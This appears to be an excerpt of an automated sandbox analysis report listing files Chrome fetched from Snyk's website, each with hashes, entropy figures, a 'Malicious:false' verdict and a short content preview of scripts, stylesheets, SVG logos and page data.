                                                                                                                                                                                                                                                                                                              SHA-256:FFA32977A0FA17629DA75EDFF00C5AC5C5F8676DC1ADDD2DC0DE3DB7FBA0B0F9
                                                                                                                                                                                                                                                                                                              SHA-512:13FEC704F5B897AE8CFD43BD62F3FCD7D5F4EBEF31D0A3A52DA5EE821D226B1FEA830ECA557F53A6804BE14524A9038D9F65FA80212B700D23D8AC942680BC2B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:!function(){window._6si=window._6si||[],window._6si.push(["setToken","50d389da3b3e04f03e03d1239ba98024"]),window._6si.push(["disableCookies",!1]),window._6si.push(["setEpsilonKey","d1c26e37d31beca9d3895cf47f60178e5fae9d81"]),window._6si.push(["enableIPv6Ping",!0]),window._6si.push(["enableIgnorePageUrlHash",!0]),window._6si.push(["enableRetargeting",!0]),window._6si.push(["setWhiteListFields",[]]),window._6si.push(["setCustomMetatags",[]]),window._6si.push(["storeTagId","22d7a014-b92d-4a73-ad20-7aebe461d6e2"]),window._6si.push(["enableEventTracking",!0]),window._6si.push(["setCompanyDetailsExpiration",!0]);for(var i=[],n=0;n<i.length;n++)window._6si.push(["addSFF",i[n]]);window._6si.push(["enableMapCookieCapture",!1]),window.dataLayer=window.dataLayer||[];var e,o;window._6si.push(["enableCompanyDetails",!0,function(i){if(""!==i){var n,e,o={},s=JSON.parse(i);if(window.dataLayer.push({company_name:s.company.name,domain:s.company.domain,country:s.company.country,address:s.company.address,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):7034
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.036762419827118
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:/koIanLX7G0iTnF1YfLsGxFsSitTZ0RsEYc8uT2NpMlAh4QUSbqzTI2x07hX3R:/kkiUYGxVitTZsYcdT2EemTG
                                                                                                                                                                                                                                                                                                              MD5:3D3230B0CC3ABA15BF79709B67D9887C
                                                                                                                                                                                                                                                                                                              SHA1:86AB550A85A12F185F5C7668776C5ADDE56F7F1E
                                                                                                                                                                                                                                                                                                              SHA-256:28598D5C0969E28975D5D5DAA985B4DFA5FC7744838F2219DEF5E89A57E99924
                                                                                                                                                                                                                                                                                                              SHA-512:7B52C1CFE9AD5C433133DAF9B448345E497148CE9BA048D361E42735AEF3C9312F1108254E409C71FE5B609F86587D40A27108C3207C5E9BD2639F77F1DCC181
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>. Created with Inkscape (http://www.inkscape.org/) -->..<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:sodipodi="http://sodipodi.sourceforge.net/DTD/sodipodi-0.dtd". xmlns:inkscape="http://www.inkscape.org/namespaces/inkscape". width="116.4803". height="22.172541". viewBox="0 0 30.818746 5.8664849". version="1.1". id="svg9535". inkscape:version="0.92.0 r15299". sodipodi:docname="manulife2018.svg">. <defs. id="defs9529">. <clipPath. id="clipPath159". clipPathUnits="userSpaceOnUse">. <path. inkscape:connector-curvature="0". id="path157". d="m 36.064,955.299 h 86.696 v 15.879 H 36.064 Z" />. </clipPath>. </defs>. <sodipodi:namedview. id="base". pagecolor="#ffff
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (54747)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):58203
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.330412170173819
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:dmCmKe8qH8xitiRTDDzFhzF0JDWb1kFHfiT0s4F4yAr6aTxiq:dh1tDHFpFUaeKs4yArxTx/
                                                                                                                                                                                                                                                                                                              MD5:207C3BEA27AB98EEEF9FE11EC71BD511
                                                                                                                                                                                                                                                                                                              SHA1:A873CFDDD5315B5B477738ACFD726C785B006934
                                                                                                                                                                                                                                                                                                              SHA-256:86EB7B3A0D6F09A5C1A60C5ABE426835B730E185A82F8C68D2A11F938F8D9D03
                                                                                                                                                                                                                                                                                                              SHA-512:B7CFF7D236FA267B38EF736579F43DEABEE64BD2B733DEEE4D6A7B846F284B2239630B5C1579C1861A667D154552BD100D8599C3771A76EBE15688284C4BFF14
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/schedule-a-demo/
                                                                                                                                                                                                                                                                                                              Preview:<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><title>See Snyk in action - Book a live demo | Snyk</title><meta name="robots" content="index,follow,max-image-preview:large"/><meta name="description" content="Chat with us today to see how Snyk can empower developers to handle security in existing workflows, measure AppSec program success with contextual risk visibility, and more."/><link rel="alternate" hrefLang="x-default" href="https://snyk.io/schedule-a-demo/"/><link rel="alternate" hrefLang="en" href="https://snyk.io/schedule-a-demo/"/><link rel="alternate" hrefLang="de" href="https://snyk.io/de/schedule-a-demo/"/><link rel="alternate" hrefLang="fr" href="https://snyk.io/fr/schedule-a-demo/"/><link rel="alternate" hrefLang="ja" href="https://snyk.io/jp/schedule-a-demo/"/><link rel="alternate" hrefLang="pt-BR" href="https://snyk.io/pt-BR/schedule-a-demo/"/><meta name="twitter:card" content="summary_large_image"/><met
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65489), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):202314
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.046778137770439
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:K0/4a6nz6Yz6Qips18BbyW1n/6eqj7bt3QJvE6v5g7m77Dy:K0/GiEkWj7xwcwgm7C
                                                                                                                                                                                                                                                                                                              MD5:6FB72977ED41E57FF7E83F16B58C9975
                                                                                                                                                                                                                                                                                                              SHA1:1AA32223AE8EF3F3EDCE8C99B2AC326030F28843
                                                                                                                                                                                                                                                                                                              SHA-256:901DFA055D796B9E86660A4F948E3D5F544D94B4481A600E565EFDDD898E7E3B
                                                                                                                                                                                                                                                                                                              SHA-512:14FC13DE7A5155C2315BD68BCB3F97BBAE23DDF86791411225BA43E12C76C019629BCC5C10B5B909448E132ACF67AD692D417393EB9A84F3D1B3351436AF2865
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/platform/security-intelligence.json?slug=platform&slug=security-intelligence
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4JgieApT4FxVhBjVeLozgu","type":"Entry","createdAt":"2022-11-09T19:43:03.207Z","updatedAt":"2023-09-23T16:58:07.088Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":67,"revision":20,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk Intelligence Security page","title":"Industry-Leading Security Intelligence Platform & Proprietary Research | Snyk","slug":"security-intelligence","uri":"platform/security-intelligence","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"0DuTDs1VWvuqAZJcY0tBu","type":"Entry","createdAt":"2022-11-09T19:43:03.299Z","updatedAt":"2024-07-26T13:15:03.323Z","envi
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):13367
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.057936866539623
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:1maFFZjROLUFKza7EIU6hUFRuKt3FLrOamnFvr2S1:13FZjROwFKzB6hUFRNFLiaeFvaS1
                                                                                                                                                                                                                                                                                                              MD5:56655DA87943D0E5EF98E742AE6EE3D2
                                                                                                                                                                                                                                                                                                              SHA1:AA87802906516962A3EC0F444031F7154B70F0AF
                                                                                                                                                                                                                                                                                                              SHA-256:256E42104F48A5FA80B031DA12DC56ACDE224FBA3F9810F8F8192B39136D365A
                                                                                                                                                                                                                                                                                                              SHA-512:0478226BADA3BA5CD80A70265B37B723F56804C35F94632CD0255F35776C93294C9EE799B3787EBCB43B1328212CB828B06ADDCD5E9FD33FFE639E9B3E5999A6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://go.snyk.io/js/forms2/css/forms2.css
                                                                                                                                                                                                                                                                                                              Preview:/* This is used to test if the stylesheet has been loaded yet*/.#mktoStyleLoaded {. background-color: #123456;. display: none;.}..mktoForm {. text-align: left;.}..mktoForm .mktoClear {. clear: both;. float: none;.}..mktoForm div,..mktoForm span,..mktoForm label,..mktoForm p {. text-align: left;. margin: 0;. padding: 0;.}..mktoForm input,..mktoForm select,..mktoForm textarea {. margin: 0;.}..mktoForm * {. font-family: inherit;.}..mktoForm .mktoOffset {. float: left;. height: 1.2em;.}..mktoForm .mktoGutter {. float: left;. height: 1.2em;.}..mktoForm .mktoFieldWrap {. float: left;.}..mktoForm .mktoFieldWrap .mktoInstruction {. display: none;.}..mktoForm .mktoLabel {. float: left;. line-height: 1.2em;. padding-top: 0.3em;.}..mktoForm .mktoField {. line-height: 1.2em;. font-size: 1em;. float: left;.}..mktoForm .mktoPlaceholder {. float: left;.}..mktoForm .mktoLogicalField {. float: left;.}..mktoForm fieldset {. padding: 0;. margin: 0;.}..mktoForm fieldset legend {.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (27317), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):27317
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.970966710926518
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:udW0T8JCEEAUMww6VQGVMyDNQo7vzRdZp4Xs4zLZF:AW44NGdeF
                                                                                                                                                                                                                                                                                                              MD5:117BC19C571D88461663E71AACB77BAE
                                                                                                                                                                                                                                                                                                              SHA1:305CF199A291FEBC9B36687AF3306B03ADE3D6F8
                                                                                                                                                                                                                                                                                                              SHA-256:A36C5E70DAEB8152C7ADC229DF0FCE9337DACD564AA860E8C661126D12C35537
                                                                                                                                                                                                                                                                                                              SHA-512:ED47435C22B130D2CCA8E6E7FCE51B383308D111450397B341A618C5E25825232D334C99D9E231672FC690A4FCE5FC5FA0C242477E43AAB68E87577B95C099B0
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://go.snyk.io/rs/677-THP-415/images/marketo-forms-styles.css
                                                                                                                                                                                                                                                                                                              Preview:.brandui{font-family:Roboto,sans-serif;color:#383f76;font-variant-numeric:proportional-nums;margin:0;padding:0}.brandui *,.brandui :after,.brandui :before{-webkit-box-sizing:border-box;box-sizing:border-box}.brandui p{margin-top:0;margin-bottom:1rem}.brandui address{font-style:normal;line-height:inherit}.brandui address{margin-bottom:1rem}.brandui strong{font-weight:bolder}.brandui small{font-size:80%}.brandui a{color:#007bff;text-decoration:none;background-color:transparent}.brandui a:hover{color:#0056b3;text-decoration:underline}.brandui a:not([href]):not([class]),.brandui a:not([href]):not([class]):hover{color:inherit;text-decoration:none}.brandui label{display:inline-block;margin-bottom:.5rem}.brandui button{border-radius:0}.brandui button:focus:not(:focus-visible){outline:0}.brandui button,.brandui input,.brandui select,.brandui textarea{margin:0;font-family:inherit;font-size:inherit;line-height:inherit}.brandui button,.brandui input{overflow:visible}.brandui button,.brandui selec
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6607), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):6607
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.018308856351984
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:wAe0cFG+fLNsl3FsJ9CDIUDL+11tpY916yqXFqyI7x7Suh1wWHMDq/lfK:wAepFGwLNsqCfXS1tbqXl/HjlfK
                                                                                                                                                                                                                                                                                                              MD5:48CCB4D22AF598DB5F6D9A2C4497B92D
                                                                                                                                                                                                                                                                                                              SHA1:58F5D599519930B88C39905DC5D73137585312FC
                                                                                                                                                                                                                                                                                                              SHA-256:A41D84A4C123569C9259EC53BA89E713610AB0C6993F2F829E4DCB3127364210
                                                                                                                                                                                                                                                                                                              SHA-512:972CE378B4E0CDC353C93527A34045DE792735DDBD3BE2D1ED5C18488B861D99D718588905FD19F007986C1F1F204BFD46BEA6F3BB217D62E2C01C09C1F4C052
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:self.__BUILD_MANIFEST=function(s,e,a,t,c,i,p,l,u,r){return{__rewrites:{afterFiles:[],beforeFiles:[],fallback:[]},"/":[s,e,a,"static/chunks/pages/index-e37833ce18fb9437.js"],"/404":[s,e,"static/chunks/pages/404-8e721a38ad5c42f6.js"],"/_error":["static/chunks/pages/_error-26a0cbf711b7e18d.js"],"/appsecmap/share":[s,t,e,"static/chunks/3863-dacde48688610dd3.js","static/chunks/pages/appsecmap/share-903ea8672d42f541.js"],"/articles":[s,t,e,a,c,"static/chunks/pages/articles-5523879d08b6c03c.js"],"/articles/[...slug]":[s,i,e,p,l,"static/chunks/pages/articles/[...slug]-59943cfdb1f546ce.js"],"/blog":[s,t,e,a,c,"static/chunks/pages/blog-83e44d3a936c8c92.js"],"/blog/feed":["static/chunks/pages/blog/feed-16f38758f2dfa9c4.js"],"/blog/[slug]":[s,i,e,p,l,"static/chunks/pages/blog/[slug]-8aaf7f01683efd16.js"],"/case-studies":[s,e,a,c,"static/chunks/pages/case-studies-b5ee76f1d0f37892.js"],"/case-studies/[slug]":[s,e,"static/chunks/pages/case-studies/[slug]-292f1412799965b1.js"],"/code-checker":[s,e,a,"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (7679), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):7696
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0792630464822235
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:ecK09NPkPYqzkPlB/j29pSQBU9zewTTedcPBRcn9F6P8e:mkr2/UJne+gnWP8e
                                                                                                                                                                                                                                                                                                              MD5:9FED311682B66D7BA1096EDA4A5281A7
                                                                                                                                                                                                                                                                                                              SHA1:467A792F0CADBB1ACA46CDB6A2944C4EEA29765A
                                                                                                                                                                                                                                                                                                              SHA-256:6CC5640D63AA6F4EA387E0D2BB602A2BA664F91CFFE81689A8A24A2F306F9AFD
                                                                                                                                                                                                                                                                                                              SHA-512:27C4678F0F6B27A5FCCC576CED889A9D4B3EAEE130CC80B22A172F9144D8F6597CDE5FE986EFDD15C5F2256FE7398A9CDF0DC85D480ECAF5AB4E10D65F6285C8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/lp/securing-ai-generated-code.json?slug=securing-ai-generated-code
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[{"sys":{"type":"Link","linkType":"Tag","id":"displayOnSecurityResourcesPage"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicAi"}},{"sys":{"type":"Link","linkType":"Tag","id":"topicApplicationSecurity"}},{"sys":{"type":"Link","linkType":"Tag","id":"typeReportsPapers"}},{"sys":{"type":"Link","linkType":"Tag","id":"typeWhitePaper"}}],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4wPKXhdmkBuVXBOMnFo272","type":"Entry","createdAt":"2024-08-05T19:13:50.161Z","updatedAt":"2024-08-26T19:25:03.885Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":15,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateLandingPage"}},"locale":"en-US"},"fields":{"internalName":"SAST essentials for AI-generated code: A security leader.s handbook - Landing page","title":"SAST essentials for AI-generated code: A security leader.s ha
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):2586
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.22533325073573
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:CoQ1FYDpkroXxBvPMSkVwFi1bUyigTZbqC8:nQipkrob+XTZbE
                                                                                                                                                                                                                                                                                                              MD5:F35C2AB645C50D7A1CFEB146606FC369
                                                                                                                                                                                                                                                                                                              SHA1:B7FD1F733C5BAD799D2810139AFCFF50AEC01D23
                                                                                                                                                                                                                                                                                                              SHA-256:1B3F666D7E29236DD7D27A03B0211AC406D2D68A3A69CB185A3930202AED2F01
                                                                                                                                                                                                                                                                                                              SHA-512:8503E323E69F247CFD2B6EB6F1874EA88E3C5A6C44023E0DF8A5EC6D7BFC6902355C9F417B5BF7DCB3CA4253FB11D406EFFBA6A8E45938B6138878E61A25E61E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1530707820/wordpress-sync/revolut-logo-black-1.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="551" height="125" viewBox="0 0 551 125" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M357.564 45.5177C348.273 37.2877 337.058 33.2653 324.091 33.2653C311.302 33.2653 300.086 37.2943 290.789 45.5177C281.498 53.5692 276.777 64.7763 276.777 79.1326C276.777 93.4889 281.498 104.689 290.789 112.92C300.08 120.971 311.302 125 324.091 125C337.058 125 348.273 120.971 357.564 112.92C367.034 104.689 371.755 93.4889 371.755 79.1326C371.755 64.7763 367.027 53.5692 357.564 45.5177ZM306.574 97.5113C301.674 92.7877 299.207 86.6548 299.207 79.1326C299.207 71.6039 301.654 65.4776 306.574 60.9259C311.474 56.2023 317.266 53.9264 324.084 53.9264C330.908 53.9264 336.873 56.2023 341.78 60.9259C346.852 65.4776 349.318 71.6039 349.318 79.1326C349.318 86.6614 346.871 92.7877 341.78 97.5113C336.88 102.063 330.915 104.339 324.084 104.339C317.266 104.339 311.487 102.063 306.574 97.5113Z" fill="#21262E"/>.<path d="M404.891 122.543V2.41333H382.812V122.543H404.891Z" fill="#21262E"/>.<path d="M4
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4822), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4822
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.012188887751148
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:rLSJ1D1yO4MAdunITe1/m+vb5ejAlJsJk1TRBX:yfczdunD/ba+su1b
                                                                                                                                                                                                                                                                                                              MD5:BC1072F0BC0A6F99055052157E07511F
                                                                                                                                                                                                                                                                                                              SHA1:33B911F0C83EBA7D4DFD1802439550E993847143
                                                                                                                                                                                                                                                                                                              SHA-256:37B82815D46552A83D5E3BA5DCAC583D20B498450439EB9CCF40946DD72044BB
                                                                                                                                                                                                                                                                                                              SHA-512:3AEADA1032385CFF72B24B31776A0299A3274EEE41B02A9191ED62FAC5920A02FA641F5BB3946123703097347DA98BB3584AB479FB7498ABC57DFDB78AFD9130
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/6936.f953d0b9b00df349.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6936],{16936:function(l,i,d){d.r(i);var o=d(85893),v=d(88015),n=d(96620),e=d(23751),u=d(74129),a=d(86943),s=d(6215),t=d(86437);let r=l=>({...a.Z,renderNode:{...a.Z.renderNode,[t.BLOCKS.EMBEDDED_ENTRY]:i=>{var d,v,e,u,a,t,r,c,f,m,p,h,b,I,y,g,k;if((null==i?void 0:null===(a=i.data)||void 0===a?void 0:null===(u=a.target)||void 0===u?void 0:null===(e=u.sys)||void 0===e?void 0:null===(v=e.contentType)||void 0===v?void 0:null===(d=v.sys)||void 0===d?void 0:d.id)==="moleculeListItem")return(0,o.jsx)(n.Z,{icon:null==i?void 0:null===(m=i.data)||void 0===m?void 0:null===(f=m.target)||void 0===f?void 0:null===(c=f.fields)||void 0===c?void 0:null===(r=c.appearance)||void 0===r?void 0:null===(t=r.listItem)||void 0===t?void 0:t.icon,label:null==i?void 0:null===(b=i.data)||void 0===b?void 0:null===(h=b.target)||void 0===h?void 0:null===(p=h.fields)||void 0===p?void 0:p.label,url:null==i?void 0:null===(g=i.data)||void 0===g?void 0:nu
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4856), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):4856
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.398512426691865
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:dA79puLE/pwbbDUgSVEFkbL/RwruFZTtnKO6:EkLE/WYgsEwL/O6fBnP6
                                                                                                                                                                                                                                                                                                              MD5:BDC1B111B7E9CC4AEA2860B03E1808D6
                                                                                                                                                                                                                                                                                                              SHA1:C4663AACD7FDEC8198DCF798558E0D4F4FD0FD44
                                                                                                                                                                                                                                                                                                              SHA-256:758F96440C3D83AD296819E80C1905D321AA0B5AE0EE9A03AFEC312F4958D610
                                                                                                                                                                                                                                                                                                              SHA-512:31E6644C6C263D4C145D9DC178778E36343E056035307AC03B403FF15901565E2F9C163FD9234FD7A92C55204CDA1EB9FE6E5E648AD62A9F6C529B73A5A263B9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/pages/index-e37833ce18fb9437.js
                                                                                                                                                                                                                                                                                                              Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5405],{45728:function(e,n,i){(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return i(68107)}])},11223:function(e,n,i){"use strict";var l=i(85893),o=i(5152),d=i.n(o),a=i(45697),t=i.n(a),r=i(9981),s=i(23751);let c=d()(()=>i.e(572).then(i.bind(i,40572)),{loadableGenerated:{webpack:()=>[40572]}}),u=d()(()=>Promise.all([i.e(6122),i.e(3602)]).then(i.bind(i,3602)),{loadableGenerated:{webpack:()=>[3602]}}),v=d()(()=>i.e(5662).then(i.bind(i,65662)),{loadableGenerated:{webpack:()=>[65662]}});function b(e){var n,i,o,d,a,t;let{component:b}=e,p=(0,s.bU)(),{sys:f,fields:h}=b,m={moleculeAlert:c,organismFeatureCta:u,organismFooterCta:v,DEFAULT:(0,l.jsx)("section",{className:"brandui-section",children:(0,l.jsx)("div",{className:"brandui-container",children:(0,l.jsxs)("p",{className:"pad-small bg-base-rose txt-fail radius-large",children:[(0,r.t)("errorRendering",p)," ",(0,l.jsx)("strong",{children:null==f?void 0:null===(i=f.contentTyp
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13978
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9813214370964976
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:Hmp4xTpemXgcNQOkFiYqNGVApKvWz+jG3:GevvkFiPgOb
                                                                                                                                                                                                                                                                                                              MD5:533DF27E519A93DF08D8C41E6EEA0211
                                                                                                                                                                                                                                                                                                              SHA1:43657736B3A7C4450184D35F8F69502DFFD7D057
                                                                                                                                                                                                                                                                                                              SHA-256:0150B39B976BB6AE71D2CD2E0280B7F8854DED02CF37C0A2C06A4155923597A0
                                                                                                                                                                                                                                                                                                              SHA-512:E575C3570DCD56DE463C47DD288F1E6964069D64CB646144E36ACA063A632BC8BB757AC51D9A46779A2DC705E2A7B58833BDE9364FD2B7DE0D3D63A4D18BB44A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg width="69" height="48" viewBox="0 0 69 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1_101)">.<path d="M28.5392 5.22846C29.6592 4.0496 31.0077 3.11129 32.5024 2.47073C33.997 1.83017 35.6065 1.50079 37.2326 1.50272C39.3962 1.50507 41.5196 2.0883 43.3808 3.19152C45.2421 4.29473 46.773 5.87748 47.8137 7.77441C49.6947 6.9427 51.7307 6.51941 53.7873 6.5325C57.7398 6.5325 61.5304 8.10262 64.3253 10.8975C67.1201 13.6923 68.6903 17.483 68.6903 21.4355C68.6903 25.388 67.1201 29.1786 64.3253 31.9734C61.5304 34.7683 57.7398 36.3384 53.7873 36.3384C52.811 36.3383 51.8372 36.2384 50.8812 36.0404C49.5287 38.4503 47.3079 40.2536 44.6716 41.0825C42.0402 41.915 39.1891 41.7016 36.711 40.4864C35.7452 42.7621 34.1178 44.695 32.0399 46.0343C29.962 47.3736 27.5296 48.0576 25.0582 47.9973C22.5868 47.9371 20.1906 47.1354 18.1804 45.6965C16.1702 44.2575 14.6389 42.2476 13.7852 39.9276C13.0145 40.0973 12.2272 40.1807 11.438 40.176C8.38682 40.1595 5.46698 38.9325 3.31995 36.7
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (51384), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51385
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.293328685395304
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:IaOFhhRC5JFhLjfRysgLzQynDw5YyDMFW8KQ:IaOFnR2DRszQKaoWtQ
                                                                                                                                                                                                                                                                                                              MD5:6626C1362840EBFC8F48294E8F023E18
                                                                                                                                                                                                                                                                                                              SHA1:4EC0DFB37C3E536C1B5EC04B68C9846FDBAF9EEF
                                                                                                                                                                                                                                                                                                              SHA-256:AABC88A6DB8B22022F96CA88E4F0A7BE426ABEF2B35169A71515A2D55246402A
                                                                                                                                                                                                                                                                                                              SHA-512:B037A19B52C1047198EC7F19E99066054E454964380E2354239834260D11248E617D6759B944DDF39A25B883C8F430603D8E13097396E2DEDA9BB6905C1CD42A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
